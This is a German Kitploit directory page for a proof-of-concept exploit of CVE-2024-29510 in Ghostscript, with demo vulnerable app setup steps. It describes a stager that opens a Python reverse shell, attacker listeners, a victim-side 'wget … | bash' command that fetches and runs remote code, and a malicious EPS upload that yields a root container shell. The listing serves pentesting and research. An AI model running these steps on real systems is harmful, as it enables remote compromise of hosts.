Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/swsmith2391/cve-2024-29510
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPayload-EntwicklungContainer-AusbruchBinary-Exploitation
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

POC-Code für CVE-2024-29510 und Demo-VulnApp

Repository anzeigen
116vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Originalforschung und POC-Code: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

HINWEIS: Ich habe außer dem ausgeführten Befehl keine Änderungen am POC vorgenommen. Alle Anerkennung gebührt Thomas Rinsma @ Codean Labs für seine großartige Forschung und den POC.

Lokales Szenario

  1. In Stager-Skript eingebettet, um ein Prüfskript herunterzuladen und auszuführen, um zu sehen, ob der Host verwundbar ist
  2. POC geändert, um eine Python3-Reverse-Shell herunterzuladen und auszuführen
  3. Stager und Reverse-Shell über STDIN heruntergeladen und ausgeführt
  4. POC hinterlässt ein Artefakt in /tmp mit zufälligem Namen

Auf dem Angreifer-Host:

  1. Mit pwncat-cs oder netcat einen Listener für 443 erstellen
  2. In das Exploit-Verzeichnis wechseln
  3. python3 -m http.server 80

Auf dem Opfer-Host (Ubuntu 23.10 mit Ghostscript 10.01.2):

  1. Terminal öffnen und ausführen: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

Remote-Szenario (VulnApp)

  1. VulnApp erstellen mit: 'docker build -t cve-2024-29510-demo:latest .' (Erfordert eine Kopie von https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz im Dockerfile-Verzeichnis)
  2. VulnApp ausführen mit: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. Versuchen Sie, good.ps zu konvertieren, um die Funktionalität zu testen. Es sollte ein gerendertes PDF mit Linien zurückgegeben werden, die einen Pfeil zeichnen, z. B. '>'
  4. Einen Webserver auf Port 80 einrichten, der shell.html hostet, z. B. 'python3 -m http.server 80'
  5. Mit pwncat-cs oder netcat einen Listener für 443 erstellen
  6. bad.eps hochladen, VulnApp wird hängen bleiben und der Listener sollte eine Reverse-Shell für den Container empfangen (läuft als root)
Tool herunterladen
  • Aus dem Container ausbrechen!